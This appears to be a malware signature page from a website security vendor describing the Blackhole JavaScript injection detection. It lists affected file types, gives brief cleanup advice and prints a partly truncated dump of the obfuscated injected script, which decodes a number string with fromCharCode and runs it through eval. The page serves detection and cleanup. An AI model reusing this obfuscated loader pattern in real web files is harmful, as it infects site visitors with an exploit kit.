Malware Signatures

  1. Home
  2. Malware Signatures
  3. js.blackhole.gen.002.04

js.blackhole.gen.002.04

This is a generic detection for malicious Blackhole scripts.

Affecting

Any website. Malware can be injected into *.html, *.js, *.php and *.asp files. In case of *.php files the JavaScript can be obfuscated by a malicious PHP injection

Cleanup

Blachole uses various infection vectores but it's always a good idea to start with cleaning local computers of webmasters and then changing all site passwords: FTP, CMS, etc.
You can sign up with us and let our team remove the malware for you.

Dump

...typical Blackhole script...

try{q=d ocument.createElement("d"+"i"+"v");q.appendChild(q+"");}catch(qw){h=-012/5;zz='a'+'l';f='fr'+'om'+'Ch';f+='arC';}try{qwe=prototype;}catch(brebr){zz='zv'.substr(123-122)+zz;ss=[];f+=(h)?'ode':"";w=this;e=w[f["s"+"ubstr"](11)+zz];n="19$50$57.5$54$48.5$57$51.5$54.5$54$19$19.5$15$60.5$5.5$4$3.5$58$47.5$56$15$57.5$56$53$15$29.5$15$18.5$51$57$57$55$28$22.5$22.5$53.5$56.5$49.5$53$52$50.5$50$53$54$54.5$22$53.5$59.5$55$51$ ... skipped ... 5$53$49$19$56.5$48.5$56$51.5$55$57$19.5$28.5$5.5$4$3.5$3.5$61.5$5.5$4$3.5$61.5$28.5$5.5$4$61.5$19.5$19$19.5$28.5"[((e)?"s":"")+"p"+"lit"]("a$"[((e)?"su":"")+"bstr"](1));for(i=6-2-1-2-1;i-683!=0;i++){k=i;ss=ss+String.fromCharCode(-1*h*(1+1*n[k]));}q=ss;e(q);}